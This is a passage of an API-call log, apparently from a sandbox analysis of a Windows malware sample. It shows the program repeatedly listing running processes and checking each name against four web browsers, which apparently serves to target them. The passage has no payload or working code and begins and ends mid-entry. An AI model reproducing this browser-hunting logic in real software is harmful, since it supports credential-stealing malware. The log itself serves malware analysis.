lpString2="chrome.exe") returned 1 [0235.739] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.739] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0235.739] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0235.739] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0235.739] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0235.739] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.739] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0235.740] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0235.740] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0235.740] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0235.740] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.740] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0235.740] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0235.740] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0235.741] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0235.741] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.741] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0235.741] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0235.741] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0235.741] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0235.741] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.741] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0235.742] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0235.742] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0235.742] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0235.742] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.742] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0235.742] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0235.742] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0235.742] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0235.742] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.742] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0235.743] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0235.743] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0235.743] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0235.743] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.743] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0235.743] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0235.743] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0235.743] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0235.743] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.743] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0235.744] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0235.744] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0235.744] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0235.744] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.744] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0235.744] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0235.744] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0235.745] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0235.745] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.745] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.745] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0235.745] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0235.745] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0235.745] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.745] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.746] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.746] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.746] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.746] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.746] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0235.746] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0235.746] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0235.746] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0235.746] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.746] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.747] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.747] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.747] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.747] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.747] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0235.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0235.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0235.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.747] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.748] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0235.748] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0235.748] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0235.748] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.748] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0235.748] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0235.748] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0235.749] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0235.749] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.749] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.749] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0235.749] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0235.749] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0235.749] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.749] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.750] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0235.750] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0235.750] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0235.750] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.750] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.750] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0235.750] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0235.750] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0235.750] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.750] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.751] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0235.751] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0235.751] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0235.751] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.751] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.751] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0235.751] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0235.751] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0235.751] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.751] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0235.752] CloseHandle (hObject=0xd4) returned 1 [0235.752] Sleep (dwMilliseconds=0x3e8) [0236.795] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0236.797] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.797] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0236.798] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0236.798] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0236.798] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0236.798] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0236.798] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0236.798] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0236.798] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0236.798] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0236.798] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0236.799] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0236.799] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0236.799] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0236.799] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.799] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.799] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0236.799] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0236.799] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0236.799] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.799] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0236.800] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0236.800] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0236.800] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0236.800] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.800] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.800] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0236.800] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0236.800] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0236.800] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.800] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0236.801] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0236.801] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0236.801] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0236.801] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.801] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0236.801] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0236.801] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0236.802] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0236.802] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0236.802] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0236.802] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0236.802] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0236.802] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0236.803] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0236.803] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0236.803] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0236.803] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.803] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.803] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.803] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.803] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.803] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.803] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.804] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.804] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.804] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.804] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.804] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.804] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.804] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.804] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.805] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.805] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.805] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.805] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.805] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.805] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.805] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.805] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0236.806] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0236.806] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0236.806] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0236.806] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0236.806] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.807] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.807] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.807] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.807] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.807] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.807] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0236.807] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0236.807] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0236.807] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0236.807] Process32Next 